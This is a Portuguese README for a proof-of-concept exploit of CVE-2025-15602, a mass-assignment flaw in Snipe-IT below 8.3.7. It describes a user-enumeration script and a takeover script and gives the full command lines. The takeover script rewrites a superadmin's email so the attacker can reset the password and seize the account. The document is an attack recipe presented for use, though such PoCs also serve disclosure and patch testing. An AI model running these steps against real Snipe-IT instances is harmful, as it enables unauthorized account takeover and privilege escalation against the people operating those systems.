
Vulnerabilidade de Mass Assignment no Snipe-IT < 8.3.7 que leva à Escalação de Privilégios
CVE-2025-15602-PoC é uma prova de conceito para a vulnerabilidade CVE-2025-15602 no Snipe-IT. Um script para listar todos os usuários e um script para assumir o controle de uma conta de superadmin.
Um usuário tem apenas o direito de editar usuários; ele pode abusar disso para listar e fazer a tomada de controle da conta do superadmin.
Não se esqueça de alterar a BASE_URL no script para corresponder à sua instância do snipe-it.
Lista todos os usuários da instância, para obter o id do superadmin do qual você deseja assumir o controle.
python3 list_users.py --attacker-username your_user --attacker-password your_pass --max-id 100
Não se esqueça de alterar a BASE_URL no script para corresponder à sua instância do snipe-it.
Assume o controle de uma conta de superadmin via atribuição em massa.
IMPORTANTE: você precisa obter as informações corretas do list_users.py primeiro ou não funcionará. O id, username e first_name devem ser exatamente os mesmos da conta alvo.
python3 exploit_auth.py \
--target-id 1 \
--admin-username admin \
--admin-firstname Admin \
--admin-email [email protected] \
--attacker-username your_user \
--attacker-password your_pass
Depois disso, você pode redefinir a senha através do e-mail que você configurou.
pip install requests beautifulsoup4